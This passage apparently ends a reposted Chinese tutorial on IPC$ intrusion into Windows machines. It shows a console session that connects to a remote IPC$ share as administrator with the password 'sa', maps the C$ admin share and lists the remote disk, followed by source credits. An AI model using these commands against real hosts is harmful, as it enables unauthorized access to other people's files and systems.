C:/>net use //192.168.0.8/ipc$ "sa" /user:administrator
命令成功完成。


C:/>net use W: //192.168.0.8/c$ "sa" /user:administrator
命令成功完成。


C:/>dir w
 驱动器 C 中的卷是 win003
 卷的序列号是 3C7D-5090

 C:/ 的目录

找不到文件

C:/>dir w:
 驱动器 W 中的卷没有标签。
 卷的序列号是 BC42-1D99

 W:/ 的目录

2006-12-12  18:12    <DIR>          airs
2006-12-01  16:36                 0 AUTOEXEC.BAT
2006-12-01  16:36                 0 CONFIG.SYS
2006-12-01  17:04    <DIR>          Documents and Settings
2006-12-26  14:36    <DIR>          Program Files
2006-12-12  18:02    <DIR>          TDdownload
2006-12-12  18:28    <DIR>          tools_jc
2006-12-14  12:09    <DIR>          WINDOWS
2006-12-01  16:40    <DIR>          wmpub
               2 个文件              0 字节
               7 个目录  4,431,769,600 可用字节

------------------------

原始文档:http://www.xfocus.net/articles/200303/493.html
创建时间:2003-03-16
浏览次数:5600
原创:iqst (papabang_at_qingdaonews.com)
来源:菜菜鸟社区htt://pccbirds.yeah.net
一份详尽的IPC$入侵资料

 

-----------------------------

经过整理手头的资料而成,并非原创,不过带着汗水,往转贴时注明出处

http://blog.csdn.net/clin003/) 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值